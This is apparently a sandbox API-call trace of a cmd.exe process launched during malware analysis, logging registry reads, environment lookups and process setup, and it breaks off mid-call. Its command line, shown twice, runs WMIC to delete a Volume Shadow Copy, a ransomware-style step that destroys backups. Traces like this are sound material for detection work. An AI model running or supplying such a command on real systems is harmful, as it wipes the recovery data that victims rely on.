GetCurrentThreadId () returned 0xa98 [0111.485] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa98) returned 0x3c [0111.486] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0111.486] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0111.486] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0111.486] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0111.486] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fc48 | out: phkResult=0x26fc48*=0x0) returned 0x2 [0111.486] VirtualQuery (in: lpAddress=0x26fc30, lpBuffer=0x26fbb0, dwLength=0x30 | out: lpBuffer=0x26fbb0*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0111.486] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fbb0, dwLength=0x30 | out: lpBuffer=0x26fbb0*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0111.487] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fbb0, dwLength=0x30 | out: lpBuffer=0x26fbb0*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0111.487] VirtualQuery (in: lpAddress=0x174000, lpBuffer=0x26fbb0, dwLength=0x30 | out: lpBuffer=0x26fbb0*(BaseAddress=0x174000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0111.487] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fbb0, dwLength=0x30 | out: lpBuffer=0x26fbb0*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0111.487] GetConsoleOutputCP () returned 0x1b5 [0111.487] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49eebfe0 | out: lpCPInfo=0x49eebfe0) returned 1 [0111.487] SetConsoleCtrlHandler (HandlerRoutine=0x49ed3184, Add=1) returned 1 [0111.487] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.487] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0111.488] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.488] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ede194 | out: lpMode=0x49ede194) returned 1 [0111.488] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.488] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0111.488] _get_osfhandle (_FileHandle=0) returned 0x3 [0111.488] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ede198 | out: lpMode=0x49ede198) returned 1 [0111.488] _get_osfhandle (_FileHandle=0) returned 0x3 [0111.488] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0111.489] GetEnvironmentStringsW () returned 0x3c8b90* [0111.489] GetProcessHeap () returned 0x3b0000 [0111.489] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xa7c) returned 0x3c9620 [0111.489] FreeEnvironmentStringsW (penv=0x3c8b90) returned 1 [0111.489] GetProcessHeap () returned 0x3b0000 [0111.489] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x8) returned 0x3c8a10 [0111.489] GetEnvironmentStringsW () returned 0x3c8b90* [0111.489] GetProcessHeap () returned 0x3b0000 [0111.489] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xa7c) returned 0x3ca0b0 [0111.489] FreeEnvironmentStringsW (penv=0x3c8b90) returned 1 [0111.489] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26eb08 | out: phkResult=0x26eb08*=0x44) returned 0x0 [0111.489] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26eb00, lpData=0x26eb20, lpcbData=0x26eb04*=0x1000 | out: lpType=0x26eb00*=0x0, lpData=0x26eb20*=0x18, lpcbData=0x26eb04*=0x1000) returned 0x2 [0111.489] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26eb00, lpData=0x26eb20, lpcbData=0x26eb04*=0x1000 | out: lpType=0x26eb00*=0x4, lpData=0x26eb20*=0x1, lpcbData=0x26eb04*=0x4) returned 0x0 [0111.490] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26eb00, lpData=0x26eb20, lpcbData=0x26eb04*=0x1000 | out: lpType=0x26eb00*=0x0, lpData=0x26eb20*=0x1, lpcbData=0x26eb04*=0x1000) returned 0x2 [0111.490] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26eb00, lpData=0x26eb20, lpcbData=0x26eb04*=0x1000 | out: lpType=0x26eb00*=0x4, lpData=0x26eb20*=0x0, lpcbData=0x26eb04*=0x4) returned 0x0 [0111.490] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26eb00, lpData=0x26eb20, lpcbData=0x26eb04*=0x1000 | out: lpType=0x26eb00*=0x4, lpData=0x26eb20*=0x40, lpcbData=0x26eb04*=0x4) returned 0x0 [0111.490] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26eb00, lpData=0x26eb20, lpcbData=0x26eb04*=0x1000 | out: lpType=0x26eb00*=0x4, lpData=0x26eb20*=0x40, lpcbData=0x26eb04*=0x4) returned 0x0 [0111.490] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26eb00, lpData=0x26eb20, lpcbData=0x26eb04*=0x1000 | out: lpType=0x26eb00*=0x0, lpData=0x26eb20*=0x40, lpcbData=0x26eb04*=0x1000) returned 0x2 [0111.490] RegCloseKey (hKey=0x44) returned 0x0 [0111.490] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26eb08 | out: phkResult=0x26eb08*=0x44) returned 0x0 [0111.490] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26eb00, lpData=0x26eb20, lpcbData=0x26eb04*=0x1000 | out: lpType=0x26eb00*=0x0, lpData=0x26eb20*=0x40, lpcbData=0x26eb04*=0x1000) returned 0x2 [0111.490] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26eb00, lpData=0x26eb20, lpcbData=0x26eb04*=0x1000 | out: lpType=0x26eb00*=0x4, lpData=0x26eb20*=0x1, lpcbData=0x26eb04*=0x4) returned 0x0 [0111.490] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26eb00, lpData=0x26eb20, lpcbData=0x26eb04*=0x1000 | out: lpType=0x26eb00*=0x0, lpData=0x26eb20*=0x1, lpcbData=0x26eb04*=0x1000) returned 0x2 [0111.490] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26eb00, lpData=0x26eb20, lpcbData=0x26eb04*=0x1000 | out: lpType=0x26eb00*=0x4, lpData=0x26eb20*=0x0, lpcbData=0x26eb04*=0x4) returned 0x0 [0111.490] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26eb00, lpData=0x26eb20, lpcbData=0x26eb04*=0x1000 | out: lpType=0x26eb00*=0x4, lpData=0x26eb20*=0x9, lpcbData=0x26eb04*=0x4) returned 0x0 [0111.490] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26eb00, lpData=0x26eb20, lpcbData=0x26eb04*=0x1000 | out: lpType=0x26eb00*=0x4, lpData=0x26eb20*=0x9, lpcbData=0x26eb04*=0x4) returned 0x0 [0111.490] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26eb00, lpData=0x26eb20, lpcbData=0x26eb04*=0x1000 | out: lpType=0x26eb00*=0x0, lpData=0x26eb20*=0x9, lpcbData=0x26eb04*=0x1000) returned 0x2 [0111.490] RegCloseKey (hKey=0x44) returned 0x0 [0111.491] time (in: timer=0x0 | out: timer=0x0) returned 0x5f517454 [0111.491] srand (_Seed=0x5f517454) [0111.491] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'\" delete" [0111.491] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'\" delete" [0111.491] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49eec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0111.491] GetProcessHeap () returned 0x3b0000 [0111.491] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x218) returned 0x3cab40 [0111.491] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3cab50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0111.491] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0111.491] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0111.491] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0111.491] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0111.491] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0111.492] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0111.492] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0111.492] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0111.492] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0111.492] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0111.492] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0111.492] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0111.492] GetProcessHeap () returned 0x3b0000 [0111.492] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c9620 | out: hHeap=0x3b0000) returned 1 [0111.492] GetEnvironmentStringsW () returned 0x3c8b90* [0111.492] GetProcessHeap () returned 0x3b0000 [0111.492] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xa94) returned 0x3cad60 [0111.492] FreeEnvironmentStringsW (penv=0x3c8b90) returned 1 [0111.492] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.492] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0111.492] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0111.492] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0111.492] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0111.492] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0111.492] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0111.492] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0111.493] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0111.493] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0111.493] GetProcessHeap () returned 0x3b0000 [0111.493] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x5c) returned 0x3cb800 [0111.493] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f910 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0111.493] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x26f910, lpFilePart=0x26f8f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x26f8f0*="Desktop") returned 0x25 [0111.493] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0111.493] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f620 | out: lpFindFileData=0x26f620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x3cb870 [0111.493] FindClose (in: hFindFile=0x3cb870 | out: hFindFile=0x3cb870) returned 1 [0111.493] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x26f620 | out: lpFindFileData=0x26f620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3cb870 [0111.493] FindClose (in: hFindFile=0x3cb870 | out: hFindFile=0x3cb870) returned 1 [0111.494] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0111.494] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x26f620 | out: lpFindFileData=0x26f620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2516f480, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x2516f480, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x3cb870 [0111.494] FindClose (in: hFindFile=0x3cb870 | out: hFindFile=0x3cb870) returned 1 [0111.494] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0111.494] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0111.494] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0111.494] GetProcessHeap () returned 0x3b0000 [0111.494] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3cad60 | out: hHeap=0x3b0000) returned 1 [0111.494] GetEnvironmentStringsW () returned 0x3cb870* [0111.494] GetProcessHeap () returned 0x3b0000 [0111.494] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xae8) returned 0x3cc360 [0111.494] FreeEnvironmentStringsW (penv=0x3cb870) returned 1 [0111.494] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49eec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0111.494] GetProcessHeap () returned 0x3b0000 [0111.495] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3cb800 | out: hHeap=0x3b0000) returned 1 [0111.495] GetProcessHeap () returned 0x3b0000 [0111.495] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x4016) returned 0x3cce50 [0111.495] GetProcessHeap () returned 0x3b0000 [0111.495] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xe4) returned 0x3c9680 [0111.495] GetProcessHeap () returned 0x3b0000 [0111.495] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3cce50 | out: hHeap=0x3b0000) returned 1 [0111.495] GetConsoleOutputCP () returned 0x1b5 [0111.495] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49eebfe0 | out: lpCPInfo=0x49eebfe0) returned 1 [0111.495] GetUserDefaultLCID () returned 0x409 [0111.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49ee7b50, cchData=8 | out: lpLCData=":") returned 2 [0111.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fa20, cchData=128 | out: lpLCData="0") returned 2 [0111.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fa20, cchData=128 | out: lpLCData="0") returned 2 [0111.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fa20, cchData=128 | out: lpLCData="1") returned 2 [0111.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49efa740, cchData=8 | out: lpLCData="/") returned 2 [0111.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49efa4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0111.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49efa460, cchData=32 | out: lpLCData="Tue") returned 4 [0111.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49efa420, cchData=32 | out: lpLCData="Wed") returned 4 [0111.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49efa3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0111.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49efa3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0111.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49efa360, cchData=32 | out: lpLCData="Sat") returned 4 [0111.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49efa700, cchData=32 | out: lpLCData="Sun") returned 4 [0111.497] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ee7b40, cchData=8 | out: lpLCData=".") returned 2 [0111.497] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49efa4e0, cchData=8 | out: lpLCData=",") returned 2 [0111.497] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0111.497] GetProcessHeap () returned 0x3b0000 [0111.497] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x0, Size=0x20c) returned 0x3c97e0 [0111.497] GetConsoleTitleW (in: lpConsoleTitle=0x3c97e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.498] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0111.498] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0111.498] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0111.498] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0111.498] GetProcessHeap () returned 0x3b0000 [0111.498] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x4012) returned 0x3cce50 [0111.498] GetProcessHeap () returned 0x3b0000 [0111.498] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3cce50 | out: hHeap=0x3b0000) returned 1 [0111.501] _wcsicmp (_String1="C:\\Windows\\System32\\wbem\\WMIC.exe", _String2=")") returned 58 [0111.501] _wcsicmp (_String1="FOR", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0111.501] _wcsicmp (_String1="FOR/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0111.501] _wcsicmp (_String1="IF", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0111.501] _wcsicmp (_String1="IF/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0111.501] _wcsicmp (_String1="REM", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0111.501] _wcsicmp (_String1="REM/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0111.501] GetProcessHeap () returned 0x3b0000 [0111.501] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb0) returned 0x3c9a00 [0111.501] GetProcessHeap () returned 0x3b0000 [0111.501] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x54) returned 0x3c9ac0 [0111.504] GetProcessHeap () returned 0x3b0000 [0111.505] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x9e) returned 0x3c9b20 [0111.505] GetConsoleTitleW (in: lpConsoleTitle=0x26f930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.506] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0111.506] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0111.506] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f4c0, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f4a0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f4a0*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0111.506] GetProcessHeap () returned 0x3b0000 [0111.506] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x218) returned 0x3c9bd0 [0111.506] GetProcessHeap () returned 0x3b0000 [0111.506] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xe2) returned 0x3c9df0 [0111.506] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0111.507] GetProcessHeap () returned 0x3b0000 [0111.507] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x420) returned 0x3b1320 [0111.507] SetErrorMode (uMode=0x0) returned 0x8001 [0111.507] SetErrorMode (uMode=0x1) returned 0x0 [0111.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\wbem\\.", nBufferLength=0x208, lpBuffer=0x3b1330, lpFilePart=0x26f1c0 | out: lpBuffer="C:\\Windows\\System32\\wbem", lpFilePart=0x26f1c0*="wbem") returned 0x18 [0111.507] SetErrorMode (uMode=0x8001) returned 0x1 [0111.507] GetProcessHeap () returned 0x3b0000 [0111.507] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3b1320, Size=0x54) returned 0x3b1320 [0111.507] GetProcessHeap () returned 0x3b0000 [0111.507] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3b1320) returned 0x54 [0111.507] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\System32\\wbem\\.") returned 1 [0111.507] GetProcessHeap () returned 0x3b0000 [0111.507] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x48) returned 0x3c9ee0 [0111.507] GetProcessHeap () returned 0x3b0000 [0111.507] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x7c) returned 0x3c9f30 [0111.507] GetProcessHeap () returned 0x3b0000 [0111.507] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c9f30, Size=0x48) returned 0x3c9f30 [0111.507] GetProcessHeap () returned 0x3b0000 [0111.507] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3c9f30) returned 0x48 [0111.508] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0111.508] GetProcessHeap () returned 0x3b0000 [0111.508] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xe8) returned 0x3c9f90 [0111.512] GetProcessHeap () returned 0x3b0000 [0111.512] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c9f90, Size=0x7e) returned 0x3c9f90 [0111.512] GetProcessHeap () returned 0x3b0000 [0111.512] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3c9f90) returned 0x7e [0111.513] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0111.513] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\wbem\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x26ef30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ef30) returned 0x3ca020 [0111.514] GetProcessHeap () returned 0x3b0000 [0111.514] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x0, Size=0x28) returned 0x3c46c0 [0111.514] FindClose (in: hFindFile=0x3ca020 | out: hFindFile=0x3ca020) returned 1 [0111.514] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0111.514] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0111.514] GetConsoleTitleW (in: lpConsoleTitle=0x26f480, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.514] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f238, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f1f8 | out: lpAttributeList=0x26f238, lpSize=0x26f1f8) returned 1 [0111.514] UpdateProcThreadAttribute (in: lpAttributeList=0x26f238, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f1e8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f238, lpPreviousValue=0x0) returned 1 [0111.514] GetStartupInfoW (in: lpStartupInfo=0x26f350 | out: lpStartupInfo=0x26f350*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0111.514] GetProcessHeap () returned 0x3b0000 [0111.514] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x20) returned 0x3c46f0 [0111.514] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0111.514] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0111.514] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0111.514] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0111.514] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0111.515] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0111.515] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0111.515] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0111.515] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0111.515] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) 